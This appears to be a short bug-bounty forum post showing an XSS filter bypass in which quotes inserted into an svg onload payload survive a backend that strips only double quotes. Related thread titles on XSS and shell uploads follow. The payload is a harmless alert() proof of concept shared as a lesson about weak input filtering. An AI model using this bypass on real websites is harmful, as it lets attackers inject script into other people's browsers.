Found an XSS bypass during a bug bounty

by x32x01 || Sep 19, 2025

Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>

Never Rely on Poor Input Filtering !

Related Threads

Polyglot Payloads in Hacking - The Exploitation Art!

x32x01
Jul 21, 2025

Replies: 0

Views: 218

Jul 21, 2025

x32x01

Bug Bounty Tips: Sensitive Data Exposure

x32x01
Jan 12, 2024

Replies: 0

Views: 765

Jan 12, 2024

x32x01

Firefox Addons for Pentesting

x32x01
Jul 2, 2024

Replies: 0

Views: 953

Jul 2, 2024

x32x01

XSS isn't dead - your website just thinks it is

x32x01
Jul 22, 2025

Replies: 0

Views: 214

Jul 22, 2025

x32x01

Bypass File Upload Restrictions on WebApps to Pop Shell

x32x01
Jan 12, 2024

Replies: 0

Views: 1K

Jan 12, 2024

x32x01

Blind XSS - The Silent Killer in Web Security

x32x01
Jul 22, 2025

Replies: 0

Views: 245

Jul 22, 2025

x32x01

Bug Bounty Hint: XSS outside of DOM

x32x01
Jan 12, 2024

Replies: 0

Views: 758

Jan 12, 2024

x32x01

script tool to extract all subdomains from crt.sh site

x32x01
Jan 12, 2024

Replies: 0

Views: 944

Jan 12, 2024

x32x01

OverTheWire: "Bandit" Solutions

x32x01
Jan 12, 2024

Replies: 0

Views: 1K

Jan 12, 2024

x32x01

The Search Engine for Cyber Security (Hackers)

x32x01
Jan 12, 2024

Replies: 0

Views: 768

Jan 12, 2024

x32x01